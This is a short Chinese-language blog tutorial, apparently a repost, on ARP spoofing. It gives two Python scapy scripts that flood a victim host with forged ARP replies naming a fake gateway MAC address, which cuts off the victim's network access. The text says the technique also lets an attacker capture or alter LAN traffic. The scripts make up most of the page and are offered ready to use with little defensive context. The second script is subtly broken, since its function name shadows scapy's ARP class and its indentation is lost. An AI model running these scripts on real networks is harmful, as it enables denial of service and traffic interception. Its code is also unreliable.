什么是ARP欺騙?
是針對ARP協議的一種攻擊技術,通過欺騙局域網內訪問者PC的網關MAC地址,使訪問者PC錯以為攻擊者更改后的MAC地址是網關的MAC,導致網路不通,此種攻擊可讓攻擊者獲取局域網上的資料包甚至可篡改資料包,且可讓網路上特定計算機或所有計算機無法正常連線,
工具準備
軟體:Python3(已安裝scapy包)
如果未安裝可使用pip install scapy命令安裝
Wireshark(用于抓包)
作業系統:這里我采用Kali Linux
開始撰寫
第一步,發包
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from scapy.all import *
arp = Ether(dst="50:46:5D:5A:F1:68")/ARP(psrc="192.168.1.1",hwsrc="ff:ff:ff:ff:ff:ff",pdst="192.168.1.104",hwdst="50:46:5D:5A:F1:68",op=2)
'''
dst和hwdst是被攻擊的設備的MAC地址
psrc是網關IP
hwsrc是偽造網關的MAC地址
'''
while True:
sendp(arp)運行結果:
第二步,改進
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from scapy.all import *
def ARP(mac1,ip1,mac2,ip2):
arp = Ether(dst=mac1)/ARP(psrc=ip1,hwsrc=mac2,pdst=ip2,hwdst=mac1,op=2)
while True:
sendp(arp)
'''
使用方法:
ARP(mac1="",ip1="",mac2="",ip2="")
mac1為受害者mac
ip1為網關IP地址
mac2為欺騙受害者的網關mac
ip2為受害者IP地址
'''作業原理
通過發送ARP包使受害者把攻擊者指定的mac地址作為網關的mac地址
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/342113.html
標籤:其他